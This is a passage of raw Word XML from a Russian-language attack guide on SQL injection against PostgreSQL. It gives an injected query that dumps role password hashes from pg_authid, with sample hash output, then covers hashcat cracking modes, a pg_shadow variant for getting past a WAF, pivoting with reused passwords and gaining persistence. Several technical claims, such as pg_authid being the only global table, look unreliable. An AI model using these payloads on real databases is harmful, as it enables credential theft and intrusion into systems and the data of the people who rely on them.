          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolvaliduntil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3EC45A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_authid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF8703" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE rolcanlogin = true --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB6185" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все login-роли кластера с хешами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700906A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres :: SCRAM-SHA-256$4096:rR/+gWl9F6OQUcK+xqL3kQ==$YV...QQ=:Tz...wM=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25511E9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>appwriter :: SCRAM-SHA-256$4096:8mZ/jHsT...==$ab...==:cd...==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410673F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>backup_op :: md5d41d8cd98f00b204e9800998ecf8427e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7455992D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>legacy_user :: &lt;no-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E24385" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Что атакующий из этого извлекает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D44F5A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SCRAM-SHA-256-хеши</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SCRAM-SHA-256$&lt;iter&gt;:&lt;salt&gt;$&lt;StoredKey&gt;:&lt;ServerKey&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, дефолт с PG 14) — оффлайн-подбор через hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-m 28600</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или john с патчем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgsql-scram</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Кост — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;iter&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (4096 — дефолт PG 14+, можно поднять через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_encryption_iterations</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29909ADA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>md5-хеши</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5&lt;hex32&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5(password || rolname)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — оффлайн-подбор через hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-m 12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PG до 13 использовал md5 по умолчанию; апгрейд кластера сам по себе не пересчитывает хеши — старые md5 остаются в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER USER ... PASSWORD ...</w:t>
      </w:r>
      <w:r>
        <w:t>. На реальных кластерах часто соседствуют SCRAM и md5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9163DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NULL `rolpassword`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (роли без пароля) — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> могут иметь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trust</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>peer</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> auth и пускать без пароля. Цель — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.6.3 file-read).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B0870E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`rolvaliduntil` в прошлом + ненулевой хеш</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пароль формально истёк, но в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запись для роли может это игнорировать; стоит проверить отдельной попыткой login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639C3EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COALESCE(rolpassword, '&lt;no-password&gt;')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нужен потому, что роль без пароля имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword = NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а NULL в конкатенации с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> поглощает всю строку — без COALESCE такая запись просто исчезнет из вывода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E62DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolcanlogin = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>; payload через неё короче (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT usename || ':' || passwd FROM pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), результат идентичен. </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет смысл, если WAF блокирует подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но пропускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3BD95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Полный дамп аутентификационной модели кластера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514CDC49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>До superuser:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> карта ролей и их привилегий (Payload A). Это позволяет точно нацелить 3.13 (понять, какую роль угонять), оценить scope (есть ли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bypassrls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для 3.17), увидеть orphaned-аккаунты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABD096" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>После superuser:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все хеши паролей login-ролей (Payload B). Если хеши </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практически мгновенный оффлайн-подбор для слабых паролей (десятки тысяч hash/sec на одной GPU). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SCRAM-SHA-256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при дефолтных 4096 итерациях даёт ~50-200 hash/sec на GPU — заметно медленнее, но всё ещё реально для словарных атак на 4096-итерационный кост.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366DCBD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-system pivot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хеши часто переиспользуются (DBA использует один пароль для нескольких кластеров, или application-пароль из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DATABASE_URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> совпадает с паролем сервиса в k8s-секрете). Подобранный пароль — это вход в смежные системы, не только в этот PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D316CD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после подбора пароля superuser-а вход без эксплуатации SQLi (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t>, pgAdmin, любой backup tool) — стабильная точка возврата, не зависящая от того, патчится ли исходная инъекция в приложении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C29525D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849A6F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственная таблица в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_global</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (cluster-wide tablespace), а не per-database </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Содержимое одинаково во всех БД одного кластера. SELECT на неё дефолтно — только SUPERUSER; с PG 14 предопределённая роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тоже даёт доступ (это сделано для backup-инструментов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96D16D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE VIEW pg_shadow AS SELECT ... FROM pg_authid WHERE rolcanlogin</w:t>
      </w:r>
      <w:r>
        <w:t>. ACL view наследуется от owner-а, но для системных view сам view имеет дефолтный REVOKE → SELECT доступен только тому, кто имеет доступ к base table (т.е. SUPERUSER).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED4D4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельный view, в котором </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> заменён на литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'********'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в SELECT-листе. SELECT на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это работает потому, что view не обращается к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для возврата значения — он возвращает константу. Поэтому через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хеш получить нельзя даже superuser-у (только через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABAF21D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E72166" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5&lt;hex32&gt;</w:t>
      </w:r>
      <w:r>
